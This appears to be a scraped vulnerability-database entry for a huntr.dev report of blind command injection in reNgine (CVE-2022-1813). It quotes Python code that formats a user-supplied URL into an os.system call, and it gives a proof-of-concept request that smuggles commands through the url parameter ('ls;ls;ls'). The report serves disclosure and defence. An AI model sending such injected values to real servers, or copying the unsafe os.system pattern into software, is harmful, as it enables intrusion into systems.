Lucene search
Ph33rrB255CF59-9ECD-4255-B9A2-B40B5EC6C572HistoryApr 29, 2022 - 1:54 a.m.
Blind command injection
2022-04-2901:54:41
ph33rr
www.huntr.dev
23
command injection
rengine project
python3
EPSS
0.003
Percentile
70.2%
Description
Hello , its my first report in huntr.dev
fast code review :
file https://github.com/yogeshojha/rengine/blob/master/web/api/views.py#L820
class CMSDetector(APIView):
def get(self, request):
req = self.request
url = req.query_params.get('url')
#save_db = True if 'save_db' in req.query_params else False
response = {'status': False}
try:
response = get_cms_details(url)
except Exception as e:
response = {'status': False, 'message': str(e)}
return Response(response)
param : url
file 2 :
https://github.com/yogeshojha/rengine/blob/master/web/reNgine/common_func.py#L668
def get_cms_details(url):
# this function will fetch cms details using cms_detector
response = {}
cms_detector_command = 'python3 /usr/src/github/CMSeeK/cmseek.py -u {} --random-agent --batch --follow-redirect'.format(url)
os.system(cms_detector_command)
response['status'] = False
response['message'] = 'Could not detect CMS!'
parsed_url = urlparse(url)
domain_name = parsed_url.hostname
port = parsed_url.port
find_dir = domain_name
if port:
find_dir += '_{}'.format(port)
print(url)
print(find_dir)
Proof of Concept
http:///api/tools/cms_detector/?format=json&url=ls;ls;ls
Related
osv
osv
CVE-2022-1813
2022-05-22 16:15:08
nvd
nvd
CVE-2022-1813
2022-05-22 16:15:08
prion
prion
Command injection
2022-05-22 16:15:00
cve
cve
CVE-2022-1813
2022-05-22 16:15:08
cvelist
cvelist
CVE-2022-1813 OS Command Injection in yogeshojha/rengine
2022-05-22 16:10:09
checkpoint_advisories
checkpoint_advisories